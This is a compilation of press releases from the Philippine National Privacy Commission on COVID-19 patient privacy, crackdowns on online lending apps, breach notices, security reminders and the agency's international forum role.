We trust that all shall be socially responsible. False information about COVID-19 may create more problems. Please refrain from sharing unverified reports and fake news to avoid undue stress and worry due to misinformation.
Finally, we emphasize that the DOH is the primary competent authority handling our country’s response to the COVID-19. We support our health department, the Inter-Agency Task Force for the Management of Emerging Infectious Disease, health front liners, emergency responders, law enforcement officers, and other persons undertaking our country’s response and measures to curtail and eliminate the COVID-19 threat.
For questions or concerns, you may visit our website at https://www.privacy.gov.ph/ and may reach us at [email protected].
###
-
-
Statement by Privacy Commissioner Raymund Enriquez Liboro on the Declaration of Public Health Emergency in Relation to COVID-19
Comments Off on Statement by Privacy Commissioner Raymund Enriquez Liboro on the Declaration of Public Health Emergency in Relation to COVID-19Data Privacy Vis-à-vis Public Health
Following the President’s declaration of a public health emergency (PHE) concerning COVID-19, it is imperative upon the government to strike a balance between individual data privacy vis-à-vis public health interests, including the public's right to know.
We wish to emphasize that the Data Privacy Act does not prevent the government from doing its job. It follows that the DPA should not prevent government, especially public health entities, from processing personal and sensitive personal information when necessary to fulfill their mandates during a public health emergency.
Government Agencies’ access to COVID-19 information
The proper handling of the health information of Coronavirus patients is crucial in stopping the spread of the virus. Government agencies mandated to address the PHE must have access to the relevant information to accomplish the purpose.
The Department of Health has been cautious in upholding patients’ confidentiality. It is releasing only information that is necessary to protect public health during this time of emergency without sacrificing its duty to determine cases and conduct contact-tracing to contain the virus.
The DOH will be walking a fine line in releasing a COVID-19 patient information to the public. Releasing patient information could produce fear and distress but may also make the people adopt the right precautions to stop the spread of the virus. During times of emergency, it is best to adhere to global best practices (as espoused by the General Medical Council, UK.) when assessing what type of patient personal information to disclose. We need to consider:
1) The potential harm or distress to the patient arising from the disclosure.
2) The potential damage to trust in doctors and health institutions in general.and weigh it versus:
1) The potential harm to the public if the information is not disclosed.
2) The potential benefits to individuals and society arising from the release of information.The DOH must continue performing its role and make that crucial call on what information is necessary for release to the public.
Safeguarding Patient Information; Upholding Right to Privacy
Revealing the identities to the public or providing information that could accurately identify people who are under investigation or have contracted the disease is counter-productive and could do more harm than good. If people believe that their identities will be released to the public when they come out for testing, they may be discouraged to come out—making it more difficult for the DOH and the rest of the inter-agency task force to identify more COVID-19 cases.
Any unnecessary disclosure of personal information may stunt government efforts to identify and test individuals with confirmed cases effectively and may have serious consequences, which could be far worse than the disease itself.
Responsible sharing of verified information
Only pertinent information necessary in facilitating contact tracing should be collected, such as but not limited to: travel history, and frequented locations. Likewise, the only information required to enable contact tracing shall be disclosed to the public.
We call on the public and the media to be responsible when sharing and publishing information to ensure the health and safety of everyone. It is prudent to confirm with the DOH’s official statistics and other information before sharing any pieces of information, especially information that would lead to the identification of an individual.
# # #
-
NPC Marks Data Protection Day 2020
Comments Off on NPC Marks Data Protection Day 2020Depicting a growing awareness among ordinary Filipinos on the importance of ensuring the privacy of their data, data subjects began sharing their thoughts on the matter in a social media post by the National Privacy Commission (NPC) marking the 14th annual celebration of Data Protection Day.
In a series of Facebook posts themed, “Ano ang kwentong data privacy mo?” (have you a data privacy anecdote?), the NPC featured testimonials from privacy advocates and professionals, encouraging page followers to chime in and even engage in a light, informative debate.
Serving as conversation starters, elicited testimonials tackled concepts related to safeguarding data, enabling trust, and respect for other people’s privacy in cyberspace.
Some said that with the implementation of Data Privacy Act of 2012, they became aware and assertive of their rights as data subjects. Others, meantime, shared annoying experiences with how certain personal information controllers allegedly handled their data.
One commenter said he became more “conscious and cautious” when sharing personal information, even making it a habit to read privacy notices and policies before agreeing to anything. On the topic of respecting other people’s data, a commenter even expressed concern that the NPC had better secured consent for the testimonials before making them public --- to which another commenter responded by explaining the basic concept of having control over one’s personal data.Data Protection Day is an international event celebrated every January 28, the date on which the Council of Europe's data protection convention, known as "Convention 108", was opened for signature in 2006.
Join the NPC in celebrating the #DataProtectionDay by sharing your thoughts on its Facebook page with the hashtag #AkoAngDataKo.
###
-
NPC shuts down 26 online lending companies
Comments Off on NPC shuts down 26 online lending companiesThe National Privacy Commission has imposed a ban on the processing of personal data against operators of 26 online lending applications, as part of the agency’s continuing crackdown on online lenders that resort to public shaming of borrowers.
In an Order dated 18 October 2019 published today, the NPC said the companies behind the 26 mobile apps failed to appear before the Commission to answer allegations filed by complainants. Since the apps continue to be available to the public for download, installation and use, the NPC decided to have them banned saying they are a “continuing threat to the rights and freedoms of data subjects.”
“In order to preserve the rights of the complainants and to protect public interest, the Commission, through its investigating officers, deems it necessary to impose a ban on the processing of personal data until the final resolution of the cases,” the Order reads.
Ordered to stop personal processing are entities behind the following online applications: Cash bus, Cash flyer, Cash warm, Cashafin, Cashaku, Cashope, Cashwhale, Credit peso, Flash Cash, JK Quickcash lending, Light Credit, Loan motto, Moola Lending, One cash, Pautang peso, Pera express, Peso now, Peso tree, Peso.ph, Pesomine, Pinoy cash, Pinoy Peso, Qcash, Sell loan, SuperCash and Utang pesos.
The operators of the 26 applications were ordered to immediately take down their online lending operations and make sure that their apps are no longer publicly available for download, installation or use. They were also directed to stop all activities that entail processing of personal data, including those outsourced to third parties, and those that involve use of information from phonebook, directory, and contact list of data subjects, as well as disclosure of false or unwarranted information, and unduly intrusive methods of personal data processing.
The NPC is now coordinating with the National Telecommunications Commission for appropriate action, as well as with Google Play Store operator Google LLC for their compliance, in accordance with the terms and conditions of their platform.
# # #
-
NPC Summons 67 more online lenders
Comments Off on NPC Summons 67 more online lendersThe National Privacy Commission (NPC) today issued summons by publication aimed at 67 unlisted operators of online lending applications, who were subject of data privacy complaints but whose identities and business addresses elude detection.
In an Order for Summary Hearing published in three newspapers of general circulation, the NPC is ordering the board of directors behind the lending apps to appear before the Commission to attend a summary hearing, submit their Responsive Comment, and present their defense.
The Order was specifically addressed to operators of the following online apps:- Akulaku
- Batis Loan
- Cash bus
- Cash flyer
- Cash loan
- Cash moto
- Cash to go
- Cash warm
- Cashafin
- Cashaku
- Cashalo
- Cashaso
- Cashmoney loan
- Cashope
- Cashwhale
- Crazy Loan
- Credit coin
- Credit peso
- Crutchpil
- First lending
- Flash cash
- Happy cash
- Hello papaya
- JK Quick Cash Lending
- Kwago
- Lalapeso (Mintwagon Lending Corp)
- Lending cash
- Light credit
- Loan champ
- Loan motto
- Loan wallet
- Mabilis cash
- Mango cash
- Mango loan
- Mcmpire
- Megaloan
- MF cash (Microdot Lending Corporation)
- Moola lending
- One cash
- Online loans Pilipinas
- Pautang peso
- Pera advance
- Pera express
- Pera lending
- Pera Pocket (Rainbow Cash)
- Pera4u
- Peso legend
- Peso lending
- Peso now
- Peso online
- Peso Q
- Peso to Go
- Peso tree
- Peso wallet
- Peso.ph
- Peso2go
- Pesomine
- Pesos ph
- Pesos.ph
- Pinoy cash
- Pinoy peso
- Pondo pocket
- QCash
- Sell loan
- Super cash
- Super peso
- Utang pesos
Failure to comply with the Order could result to a ban on their processing of personal data and the elevation of the complaints to the Commission for decision.
“Our investigation team is committed in attending to all the complaints filed against online lending apps. However, to date, only the Uniform Resource Locator (URL) and the developers behind the 67 apps are identifiable. They have no known company name and business address, nor has anyone appeared before the Commission to represent them. Our investigators are aware that some of these online lending apps are just existing in the cloud. With the defendants being unknown, summons by publication is needed in order to comply with the rules on acquiring jurisdiction and the principle of due process,” said Privacy Commissioner Raymund Enriquez Liboro.
Previously, three online lending companies, Fast Cash Global Lending, Inc., Unipeso Lending Company, Inc., and Fynamics Lending Inc., have been ordered to explain before the Commission the allegations contained in NPC’s fact-finding reports.
In the complaints received by the NPC, online lenders allegedly accessed and used mobile phonebooks of the victims without their consent. Using the phonebook data, the online lenders allegedly informed people in the contact list that they were named as co-makers or character references by borrowers.In some reports, these contacts were even asked to settle the loan. Agents or representatives of lending apps also posted borrowers’ personal and sensitive personal information on social media sites.
# # #
-
NPC launches Privacy Awareness Week 2019 official website
Comments Off on NPC launches Privacy Awareness Week 2019 official websiteThe National Privacy Commission (NPC) is enjoining personal information controllers and processors in the private and public sectors to celebrate the National Privacy Week 2019 (PAW) on May 25 to 31, with the launch on Friday of its official event website: paw.privacy.gov.ph.
Pursuant to President Rodrigo Roa Duterte’s Proclamation No. 527 signed last year, the PAW is annually observed every last week of May in recognition of the “need to inform and educate the public about data privacy, data protection and fair information rights and responsibilities as part of reinforcing the efforts of the NPC in protecting personal data and ensuring the Philippines’ compliance with international standards set for data protection.” The PAW is also aligned with the annual effort to raise privacy awareness across member countries of the Asia Pacific Privacy Authorities (APPA), which include the Philippines.
In a speech before data protection officers recently at the New World Hotel in Manila, Privacy Commissioner Raymund Enriquez Liboro announced this year's theme; “Protecting the Digital Filipino: Accountability, Compliance & Ethics in a Data-driven Philippines,” emphasizing the need to continually raise privacy safeguards. This, with a view to fully harnessing opportunities in a digital global economy.
“In a disruptive era of digital transformation, a compliance-centric mindset among personal information controllers and processors would not be enough if our goal is to truly protect the digital Filipino. What we need is to institutionalize a sense of accountability and ethics in the handling of personal data in our organizations,” Liboro said.
New Zealand, a staunch advocate of data privacy and protection, supported NPC’s soft launch with the presence of their Privacy Commissioner John Edwards. In his address to the audience, Commissioner Edwards insisted that companies equip their DPOs with the right tools and systems to ensure the secure storage of personal data and to protect it from threats and attacks. A breach notification system, for instance, helps determine the capability of an organization’s data security system.
During the event, Liboro also announced that the NPC shall hold a flagship event in celebration of PAW 2019 called the 2nd National Data Privacy Conference (NDPC). Slated on May 23 and 24 at the Philippine International Convention Center, the two-day event is by-invitation and expected to draw over 2,000 data privacy professionals.
A notable feature on day 2 of the NDPC is the First Digital Data Governance for the Public Sector, a conference within a conference aimed at driving compliance of government offices with the Data Privacy Act and other laws relevant to the protection of the digital Filipino.
“For the NDPC, we want leading stakeholders to better appreciate their leadership role in terms of compliance and the ever present need to enhance their skills. The newbies, on the other hand, will have a chance to jumpstart their understanding of the DPA and the Commission’s rules and regulations,” Liboro said.
The NDPC was first introduced to the public in 2018 to celebrate PAW.
There are five ways for organizations to celebrate PAW: generate interest; cultivate the habit of privacy mindfulness at the workplace; take pride in their efforts to protect their customers; emPAWer stakeholders by reminding them of their rights; and spreading the word using the hashtags #PAW2019 and #PrivacyPH. Data subjects, meanwhile, may practice the NPC’s 30 Ways to Love Yourself Online.
# # #
-
PH, Singapore co-lead the ASEAN Data Protection and Privacy Forum
Comments Off on PH, Singapore co-lead the ASEAN Data Protection and Privacy ForumThe National Privacy Commission (NPC) is closely working with Singapore’s Personal Data Protection Commission (PDPC) in developing the ASEAN Framework on Digital Data Governance.
In the 2nd Working Group Meeting on ASEAN Digital Data Governance Framework recently at the Diamond Hotel in Makati, Privacy Commissioner Raymund Enriquez Liboro formally accepted Singapore’s invitation for the Philippines to co-lead the initiative.
"I would like to express my appreciation to Singapore for extending this invitation. The Philippines, through the National Privacy Commission, agrees to co-lead in this initiative and we are honored to take part to further develop and implement a data privacy forum in the ASEAN region, which will bolster data privacy in the region. We look forward to further cooperation with Singapore and all ASEAN member states to foster a community where data protection and privacy thrives," Liboro said.
Endorsed last December by delegates of the ASEAN Telecommunications and Information Technology Ministers, the framework is aimed at strengthening the region’s data ecosystem. This includes achieving legal and regulatory alignment of data regulations and governance frameworks in the region; and fostering data-driven innovation to boost growth of digital economy.
The Philippines would specifically co-lead one of the four initiative called the ASEAN Data Protection and Privacy Forum. Its two target outcomes are to harmonize legal and regulatory landscapes in the region; and the development and adoption of best practices.
To date, the Philippines is one of only three Southeast Asian countries with comprehensive data protection law and fully-established functioning data privacy authority regulator.
# # #
-
Press Statement of Privacy Commissioner Raymund Enriquez Liboro RE: BREACH NOTIFICATION BY CEBU AIR, INC.
Comments Off on Press Statement of Privacy Commissioner Raymund Enriquez Liboro RE: BREACH NOTIFICATION BY CEBU AIR, INC.1. At 11:37 AM today, Cebu Air, Inc. emailed a preliminary notification to the National Privacy Commission informing us of an “unauthorized breach” of its website’s database (www.getgo.com.ph), as prescribed by NPC protocols.
2. In the notification, the company’s Data Protection Officer (DPO) Randall Evangelista, said the “extent and nature” of the breach is still being determined.
3. Following this, we have instructed DPO Evangelista to also ascertain if there is a need to inform affected data subjects of the breach, along with specific precautions and other measures they may take to protect themselves. We have instructed Evangelista to personally report tomorrow to the NPC complaints and investigation team.
4. The NPC shall issue public updates on the incident as they become available.
# # #
-
NPC cautions offices on personal data protection issues during Holy Week 2019
Comments Off on NPC cautions offices on personal data protection issues during Holy Week 2019The National Privacy Commission (NPC) is reminding public and private offices to be extra vigilant against hackers and data thieves this Lenten break.
Privacy Commissioner Raymund Enriquez Liboro said Personal Information Controllers (PICs), Personal Information Processors (PIPs), and Data Protection Officers should ensure personal information under their organization’s care are safeguarded from potential cybersecurity attacks, the likelihood of which may increase during long holidays.
“Digital and physical break-ins are more likely to occur during long breaks when there’s minimal staffing in offices,” Liboro warned. “The use of strong passwords is essential in protecting personal information from malicious intentions. One precaution that PICs, PIPs, and DPOs should do during the long break is password-protect or encrypt files and databases on servers, computers, and other devices in their organization. If necessary, change passwords.”
Take note of the following recommendations:
- Place non-mission critical systems off-line, especially those that contain or have access to personal data.
- For systems that are kept off-line, make sure that all system activities are recorded, and the logs are secure.
- Conduct a backup of files (digital and non-digital), systems (e.g. server access, files, logs), and databases. If possible, do not bring them outside the office such as in portable devices.
- Ensure that respective workstations are shut down properly and electrical connections are cut off accordingly.
- Discourage physical security breaches by securing office premises adequately. Keep personal valuables safe.
- Make sure all physical documents containing personal information are secure in locked file cabinets.
- Log out all accounts in computers.
- Ensure that proper system updates are done to ensure that your system and even computers are protected from threats and possible attacks.
- Ensure that appropriate intrusion detection systems (e.g. firewall, anti-virus) are in place and properly working.
- Ensure that the organization has a response and recovery plan that would be useful in times of emergencies, disasters, or even system attacks.
- Ensure that the employees are reminded and/or educated regarding the organization's security measures that must be observed (e.g. accessing work documents outside the office premises).
# # #
-
Statement of Privacy Commissioner Raymund Enriquez Liboro on the recent April Fool’s hacking incidents
Comments Off on Statement of Privacy Commissioner Raymund Enriquez Liboro on the recent April Fool’s hacking incidents1. Beginning 1 April 2019 until yesterday, the National Privacy Commission has gathered reports and claims of alleged hacking incidents of certain websites that may have involved personal data.
2. The incidents include hacking of individual user accounts on Facebook, Twitter, Yahoo, and Wattpad, among others. There were also some websites operated by some private and public organizations that were hit.
3. At least one group of local hackers has claimed ownership of these acts.
4. We expect to learn the details from affected Personal Information Controllers (PICs). Upon discovery of a personal data breach, and upon meeting certain criteria, a PIC has 72 hours to notify the NPC and the affected data subjects of the scope, nature, and extent of the data breach. In any event, appropriate actions should be taken to safeguard data subjects.
5. Under the Data Privacy Act, the failure to timely report a data breach is punishable by up to 5 years imprisonment and a fine of up to 1 million pesos upon conviction. Unauthorized Access or Intentional Breach is punishable by up to 3 years imprisonment and a fine of up to 2 million pesos upon conviction. Likewise, responsible officials of PICs who prove to be negligent in safeguarding personal data may also face imprisonment of up to 6 years and a fine of up to 4 million pesos upon conviction.
6. These hacking incidents are now under investigation.
7. Meantime, data subjects who may have been affected by any these or any similar incidents may call the NPC for complaints at 022342228 (local 114) or email us at [email protected].
# # #
-
Statement of Privacy Commissioner Raymund Enriquez Liboro on Facebook’s Use of Plain Text in Stored Passwords
Comments Off on Statement of Privacy Commissioner Raymund Enriquez Liboro on Facebook’s Use of Plain Text in Stored Passwords1. Today Facebook announced that millions of users’ passwords were discovered in January to be stored in a readable format within their internal data storage systems. This first came about after a revelation by a security expert, who claims that this practice has been going on since 2012 and that the passwords could be accessed by more than 20,000 employees of Facebook.
2. The storage of Facebook passwords in plain text needlessly exposed people to risk. Passwords that are stored in plain text are more easily and readily stolen by those who intend harm; they may even be compromised by accident.
3. In a conversation this afternoon with Facebook Privacy and Public Policy Manager for Asia Pacific, Arianne Jimenez, we sought more details. Jimenez reaffirmed that they found no evidence so far that anyone internally abused or improperly accessed the said dataset and said they will be notifying everyone affected.
4. Even if there is no evidence of abuse, there is little comfort in knowing that the world’s largest repository of personal data practices such lax internal controls. In a 2018 study, the Ponemon Institute (a global information security think tank) found that 60% of businesses indicated that their data breaches come from negligent employees or contractors. 1
5. If you are affected and you receive notice from Facebook, change your passwords immediately and enable multi-factor authentication. Begin to exercise better digital hygiene. For more information, visit our 30 Ways to Love Yourself web post at privacy.gov.ph/30-ways/.
1 https://keepersecurity.com/assets/pdf/Keeper-2018-Ponemon-Report.pdf
-
NPC postpones submission of 2018 Annual Security Incident Report
Comments Off on NPC postpones submission of 2018 Annual Security Incident ReportThe National Privacy Commission (NPC) has postponed indefinitely the submission of the Annual Security Incident Report (ASIR) covering the calendar year 2018.
The Commission is currently revising some of its key processes with a view to enhancing reportorial efficiency and harmonizing documents submissions with the Department of Information and Communications Technology. The revisions aim to improve user experience for Personal Information Controllers (PICs), and Personal Information Processors (PIPs), in the private and public sectors.
The ASIR is a compliance requirement for PICs and PIPs under the Data Privacy Act’s IRR. It is a way to document security incidents, enabling PICs and PIPs to better anticipate risks and threats.
PICs and PIPs are advised to continue documenting security incidents as usual and stay updated on related NPC announcements.
Meantime, those who have accomplished the 2018 ASIR and wish to submit them may still do so any time via email to [email protected], through our digital portal, or by hard copy submission using the current template
-
Statement of Privacy Commissioner Raymund Enriquez Liboro on the Mobile Number Portability Act recently signed by President Rodrigo Roa Duterte
Comments Off on Statement of Privacy Commissioner Raymund Enriquez Liboro on the Mobile Number Portability Act recently signed by President Rodrigo Roa Duterte1. We laud President Rodrigo Roa Duterte for signing the Mobile Number Portability Act. The law provides mobile postpaid or prepaid subscribers with the mechanism to retain an existing mobile number despite having moved from one mobile service provider to another. This gives data subjects control over their data which is a basic tenet under the Data Privacy Act.
2. The National Privacy Commission supports the proper implementation of this law which promotes consumer welfare and fosters innovation and competition in the telecommunications industry.
3. We likewise recognize this measure as an embodiment of the right to data portability provided under Section 18 of the Data Privacy Act of 2012 (DPA). This right gives data subjects the mechanism to obtain their personal data in an electronic or structured format from personal information controllers, if such personal data is being processed through electronic means, and enables the further use of such personal data by the data subjects.
4. We shall continue to work with the National Telecommunications Commission (NTC) and all concerned agencies tasked to implement this law and provide additional inputs in the crafting of the Implementing Rules and Regulations (IRR) and other policies, as may be necessary and appropriate.
5. In the implementation of the Mobile Number Portability Act, the NTC, together with the NPC, shall endeavor to ensure that public telecommunications entities handling the subscribers’ personal data shall strictly adhere to the provisions of the DPA, and provide safeguards to protect said personal data in the course of porting activities, bearing in mind the data privacy rights of the subscribers.
###
-
Privacy Commission extends validity of registration until 2020
Comments Off on Privacy Commission extends validity of registration until 2020Personal Information Controllers (PICs) and Personal Information Processors (PIPs) that completed at least Phase-I of their registration with the National Privacy Commission (NPC) by 2018 are not required to renew their registration this year. The validity of their registration is extended until 8 March 2020.
They are also entitled to an official digital certificate of registration, available upon request with the NPC.
PICs and PIPs covered by NPC Circular 17-01 that have not yet registered are still required to register their Data Protection Officer to avoid possible liabilities. For instructions on how to comply with this requirement, please click this link.
For more details, refer to the FAQ page or contact us at:
Email Address: [email protected]
Phone Number: (02)510-83-09
Mobile Number: +639451534299 TNT / +639652863419 TM -
Official Statement of Privacy Commissioner Raymund Enriquez Liboro on the Cebuana Lhuiller Breach
Comments Off on Official Statement of Privacy Commissioner Raymund Enriquez Liboro on the Cebuana Lhuiller Breach1. On Friday, 18 January 2019, representatives from Cebuana Lhuiller went to the National Privacy Commission to seek assistance regarding a data breach involving their email server. At the meeting, they committed to submit a more detailed report regarding the data breach. Cebuana Lhuiller informed us that it has engaged the services of a third party information security service provider to handle their mitigation and response to this incident.
2. We await further details as to scope and severity of the breach.
3. Cebuana Lhuiller has 72 hours from discovery of a data breach to report the same to the Commission and affected data subjects. The data subject notification must be done individually, and not further expose the data subject to more harm.
4. This incident is now under investigation.
-
NPC opens passport data probe
Comments Off on NPC opens passport data probeThe National Privacy Commission (NPC) has granted the Department of Foreign Affairs (DFA) 5 more days before formally facing its preliminary fact-finding inquiry on the passport data issue.
In a meeting this morning, the NPC’s Legal and Enforcement Office asked DFA representatives headed by Director Anthony A.L. Mandap to give preliminary details surrounding the issue. Mandap said he was sent to the meeting just to “formally convey” their written request for postponement since they are “still conducting an internal investigation”. He said he could not speak beyond the scope of what was written in the request.
In the letter sent to NPC late Tuesday afternoon, the DFA’s Data Protection Officer (DPO) Menardo G. Macaraig said the DFA’s own “preliminary inquiries on the matter indicate that there was no data breach because the Asia Productivity Organization Protection Unit, a government-owned and controlled corporation and recognized government printer, remain in custody and control of said data, and that said data has not been shared with or accessed by an unauthorized third party, which may use it for illicit purposes”.
Speaking to media reporters, Privacy Commissioner Raymund Enriquez Liboro said today’s initial meeting may have been brief but productive.
“The NPC’s investigation continues. In their own preliminary probe, the DFA said it is in control of the data. That says a lot already to assuage the public. The data in question is not controlled by any unauthorized parties. That was what today’s meeting with the DFA established. The data is under their safekeeping,” Liboro said.
Commissioner Liboro looks forward to next Monday’s fact-finding meeting, which will include representatives from both the DFA and APO.
“The lessons we could learn from this incident would go a long way in ensuring better government practices. They would form part of the recommendations the NPC shall later issue to government offices contracting third parties. We’re looking to the future for ways to further protect personal data. The law obliges data controller like the DFA to strictly implement contractual means to protect data when they deal with third parties and government contractors. We look forward to improving on that based on lessons we learn here,” Liboro added.###
-
Press Statement of Privacy Commissioner Raymund E. Liboro on DFA's Claim Regarding Philippine Passport Data
Comments Off on Press Statement of Privacy Commissioner Raymund E. Liboro on DFA's Claim Regarding Philippine Passport DataThe National Privacy Commission shall conduct its own investigation on the Department of Foreign Affairs assertion that a private contractor has caused the non-availability of Filipino passport data and other documents entrusted to it for processing.
Any form of non-availability of personal data, infringement of the rights of data subjects, and harms from processing that include inconveniencing the public, must be adequately explained to the satisfaction of the law.
We will summon the DFA and concerned agencies including the alleged contractor to determine the facts surrounding the case.
Rest assured the NPC will continue to champion the rights of Filipino data subjects.
-
NPC launches DPO ACE Program, sets benchmark for data privacy training in PH
Comments Off on NPC launches DPO ACE Program, sets benchmark for data privacy training in PHThe National Privacy Commission (NPC) today unveiled its DPO Accountability, Compliance, and Ethics (ACE) Program, aimed at establishing a skills benchmark for local privacy professionals, amid the spike in demand for high-quality data privacy trainings in the country.
Around 50 practicing Data Protection Officers (DPOs) from leading government offices and top corporations attended the pilot class of the DPO ACE Program, which is comprised of 3 days of intensive lectures and workshops beginning December 12 to 14, at the 2nd Floor, Secretariat Building, Philippine International Convention Center, Manila.
In his keynote, Privacy Commissioner Raymund Enriquez Liboro stressed the importance of building trust in today’s digital world, a key concern where DPOs can make a real difference.
“The ACE Program will align all of us in doing the right things right. Overall, the program aims to build privacy resilience and culture in whatever milieu you are living and working in,” Liboro said.
The Privacy Commissioner said, “data ethics are the brakes we need now,” emphasizing that it would be the NPC with the help of DPOs, who are called upon to make judgement calls on behalf of data subjects. “Who else will remind everyone that behind binary 1’s and zeroes are actual human beings that could be adversely affected by unethical use [of data],” he added.
The latest McKinsey Report stated that cross-border data flow has swelled to more than 210 terabytes per second, or about 1.6 billion selfies a minute. he noted that world is in the cusp of a digital transformation that has given birth to new industries and forced old ones to adapt.
Liboro said the program fulfills the NPC’s goal of training an entire generation of DPOs prepared to embrace ethical data processing, saying that DPOs are the representatives of the NPC in their organizations.
“Ultimately, DPOs protect their organizations above all. It is in the interests of everyone – data subjects, the NPC, personal information controllers, and DPOs – that the processing of personal data is handled with clear lines of accountability, in compliance with the law, and in the most ethical way possible,” Liboro said.
The ACE DPO Program has three levels and comprises advanced case studies, practical, and written exams. Those who successfully passed will be issued a certificate reflecting their DPO skills level. Thus, ACE-1, ACE-2, and ACE-3.
Among the participants in the pilot class are the DPOs from diverse organization, including the Department of Trade and Industry, Department of Information and Communications Technology, Smart, Inc., ABS-CBN, San Miguel Corporation, IBM Philippines, Ospital ng Muntinlupa, MoneyGram, Home Credit, Cebu Pacific, De La Salle University, LBC, Philippine Hotel Owners Association, IT & Business Process Association of the Philippines, Pharmaceutical & Healthcare Association of the Philippines, Asian Institute of Management, and the Association of HMOs of the Philippines, Inc.
The NPC will make the DPO ACE Program publicly available to all interested DPOs beginning next year, side-by-side its other major initiatives, such as the PSST! (Privacy, Safety, Security, and Trust Online) campaign, the Data Privacy Council, Privacy Watch, which shall also be rolled out in the regions.
Demand for data protection officers is rising worldwide as the global technology industry booms. The International Association of Privacy Professionals estimated that around 75,000 DPOs are needed all over the globe. DPOs are most sought-after in industries processing large amounts of personal data, such as technology, finance, healthcare, retail, and digital marketing.
# # #
-
NPC lauded for PH’s global leadership spot in ICDPPC
Comments Off on NPC lauded for PH’s global leadership spot in ICDPPCInternational and local governing bodies have commended the National Privacy Commission (NPC) for earning a global leadership role for the Philippines in international discussions on data privacy.
Privacy Commissioner Raymund Enriquez Liboro represented the country in the International Conference of Data Protection and Privacy Commissioners (ICDPPC) held in Brussels, Belgium on Oct. 23. Following closed session deliberations, the Philippines emerged to become among the five members of the Executive Committee, joining Australia, Canada, Burkina Faso, and the United Kingdom, which got the chairmanship this year under Commissioner Elizabeth Denham.
New Zealand Privacy Commissioner John Edwards is confident the NPC under Liboro would serve to “invigorate” the committee and bring a “really strong voice” to the constant transatlantic conversation about data privacy by introducing “different legal and cultural traditions.”
“It’s so good to have such a new Commission take a central place on the international stage, I hope that you have success. I have great confidence in Raymund [Liboro’s] ability to represent the Philippines and the Asia-Pacific region at our international forum,” Edwards said.
Senator Gregorio Ballesteros Honasan expressed support for Liboro and hailed his win for the country in the international body as one more opportunity to serve people.
“Congratulations on your recent appointment to the ICDPPC. Continue serving God, country, family, and of course, the highest – public interest," Senator Honasan said.The Presidential Communications Operations Office (PCOO) viewed NPC’s election as a testament that the international community is beginning to recognize the Philippines' efforts in the development and improvement of the country’s data protection and privacy regulations.
PCOO Assistant Secretary Michel Kristian Ablan credited this success to Liboro’s “impeccable integrity” and vision – qualities that ICDPPC leaders must possess. Ablan believes the election will help the Philippine government adopt global standards in strengthening and enhancing current systems, practices, and policies in data management and protection of its economic institutions.
“This development is also expected to heighten local and international consumer trust and confidence in these institutions, especially the digital market, which is now considered as a major contributor to economic development,” Ablan said. “Investor confidence in the Philippines will increase and hopefully will translate to increased direct foreign investments which should boost employment and local industries.”
In a public post on its official Facebook page, the Ayala Corporation extended its congratulations to and support for Liboro.
“Ayala Corporation extends its congratulations to and support for Commissioner Raymund Enriquez Liboro of the NPC, who represents the Philippines in the ICDPPC. While the Philippines has been actively committed to the enforcement of data privacy through the NPC, this election grants the country a global leadership role in the international discussion,” ,” the post said.Philippine Chamber of Telecommunications Operators (PCTO) Vice President Atty. Roy Ibay also applauded NPC for “quickly landing its place” among nations putting data protection as a cornerstone for the progress and development of the information and communications technology sector.
Teodoro Padilla, President of the Pharmaceutical and Healthcare Association of the Philippines (PHAP), attributed the country’s election to Liboro’s successful guidance in the implementation of the National Data Privacy Act of 2012.
“The Pharma Sector commends the National Privacy Commission as steward of data privacy rights while ensuring the free flow of information for innovation, growth and national development,” Padilla said. “Economic growth can be achieved from cultivating a culture of mutual trust, transparency and collaboration with the public and private sectors.”
Added Padilla, Liboro is forming and fostering a community of Data Privacy advocates by encouraging sector participation and helping them attain full compliance with the DPA. This collaborative approach can be considered as “a global best practice and crucial in advancing data privacy protection” in Asia-Pacific.
Gathering 236 delegates from 76 countries, the recently concluded 40th ICDPPC has adopted a roadmap to cement the Conference as a more permanent and vocal international organization advancing data privacy and protection.
This includes the creation of a consultation platform or “contact group” for improved dialogue and exchanges of ICDPPC activities; a declaration on ethics and data protection in artificial intelligence; resolutions on e-learning platforms; and collaborations between Data Protection Authorities and Consumer Protection Authorities.
###
-
PH WINS SEAT IN INT’L. PRIVACY BODY
Comments Off on PH WINS SEAT IN INT’L. PRIVACY BODYBrussels- Belgium, Despite being a newcomer to data privacy regulation, the Philippines has earned a voting seat in the 5-member executive committee of the International Conference of Data Protection and Privacy Commissioners (ICDPPC), a worldwide conference of 119 independent regulators from all over the world, coming together to explore high-level proposals on data privacy and protection. The ICDPPC is considered the world premier body on data protection and privacy. The voting was held on October 23, 2018 during the closed session meeting at the Palais D’ Egmont in Brussels Belgium.
Commissioner Raymund Enriquez Liboro of the National Privacy Commission (NPC) has led the Philippines’ active involvement in the conference for the last two years, drawing attention to the country’s efforts to step up to global data protection standards with a uniquely Asian approach to regulation. “It is an honor for the NPC to represent the country at the ICDPPC, especially in a leadership capacity. This is an acknowledgement of the hard work we expend, as well as the country’s commitment to data protection,” Liboro said.
The Conference’s Executive Committee is composed of seven elected members plus one observer with a term of two years. Aside from the Philippines, the current members include the privacy authorities of Australia, Canada, Burkina Faso, Bulgaria, Albania, Mexico, and the United Kingdom which holds the chairmanship under Commissioner Elizabeth Denham. The conference has two additional members, comprising of the next hosting authorities namely: Albania and Mexico. The 2018 Conference has attracted more than 1200 delegates all over the world.
“Having a seat at the committee’s table to take part in addressing challenges that privacy regulators face is definitely a privilege for the NPC. It’s an opportunity for learning from each other’s experience. Definitely, the Philippines although young has a lot to contribute too especially in assisting new members.” Liboro added.
The conference continues to grow having approved four additional members in the recent closed session coming from Germany, Korea, and Argentina; and eleven new authorities with observer status, notably from Asia, namely: India, Indonesia, Malaysia, Saudi Arabia, and Abu Dhabi.
The NPC’s election comes at a time when the call for a new world order governing data is gaining traction on a global scale.
“What we are seeing today is a crisis of trust that is fueled by unauthorized profiling, surveillance and increasing cases of personal data breaches. It’s a hint for us take a different tact and integrate ethics in the way we process personal data” Liboro said.
As part of the committee, the NPC is expected to take part in setting the agenda of the conference and in defining its strategic direction for the next two years.
“I’m very happy that the Philippines is becoming a new member of the Executive Committee. I think it shows the geographical diversification of this Executive Committee – the fact that new entities are entering and bringing energy and new ideas to this Executive Committee. I think it strengthened the International Conference so it’s a very good signal and I’m happy to welcome the Philippine authority in the group,” French Privacy Commissioner Isabelle Falque-Pierrotin and outgoing Chair of the ICDPPC, said.
